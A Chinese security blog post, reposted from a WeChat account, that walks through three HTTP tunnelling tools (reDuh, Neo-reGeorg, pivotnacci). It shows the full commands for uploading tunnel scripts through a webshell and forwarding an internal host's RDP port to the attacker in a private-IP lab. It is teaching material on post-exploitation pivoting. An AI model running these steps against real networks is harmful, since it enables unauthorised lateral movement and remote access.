http隧道

admin 2024年3月20日20:09:46评论10 views字数 1109阅读3分41秒阅读模式

免责声明

      文章所涉及内容,仅供安全研究教学使用,由于传播、利用本文所提供的信息而造成的任何直接或间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任

这里我们介绍几种http隧道工具reDuh,Neo-reGeorg,pivotnacci-master

kali:192.168.1.18
web服务器:192.168.1.19
                   192.168.10.9
域内主机:192.168.10.3

一.reDuh

当我们拿到一个webshell权限的时候,便可以在web服务器和vps上建立一个http的隧道通过reDuh搭建一个http隧道后将域内其他主机的3389的远程连接端口转发到vps或者攻击机

  1. 通过webshell上传server端到根目录下

    http隧道

2.在攻击机中启动client端java -jar reDuhClient.jar http://192.168.1.25/reDuh.php,建立http隧道

http隧道

3.攻击机的1010端口开启监听,通过nc -nv 127.0.0.1 1010 进行一个正向代理管理

http隧道

4.执行[createTunnel]8888:192.168.10.3 将靶机的3389端口的远程登陆服务转发到攻击机上的8888端口

http隧道

5.使用rdesktop去连接本地的8888端口,rdesktop 127.0.0.1:8888

http隧道

二.Neo-reGeorg

该工具就是在reDuh进行了一些升级

  1. 对文件文件先进行加密python neoreg.py generate -k password  

    http隧道

2.通过webshell上传tunnel.php文件

http隧道

3.将流量转发到攻击机的8888端口上 python neoreg.py -k password -u http://192.168.1.25/tunnel.php -p 8888

http隧道

4.配置本地的proxychains4.conf socks5 127.0.0.1 8888

http隧道

5.proxychains rdesktop 192.168.10.3

http隧道

.pivotnacci-master

1.pip3 install -r  requirements.txt 安装库
2.python3 setup.py install
3.将agent.php放到网站根目录下

http隧道

3.启动将流量转发到本地的6666 
./pivotnacci http://192.168.1.25/agent.php -p 6666 --password test -v

http隧道

4.配置本地的proxychains4.conf socks5 127.0.0.1 6666

http隧道

5.proxychains rdesktop 192.168.10.3

http隧道

原文始发于微信公众号(泾弦安全):http隧道

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月20日20:09:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   http隧道https://cn-sec.com/archives/2589473.html

发表评论

匿名网友 填写信息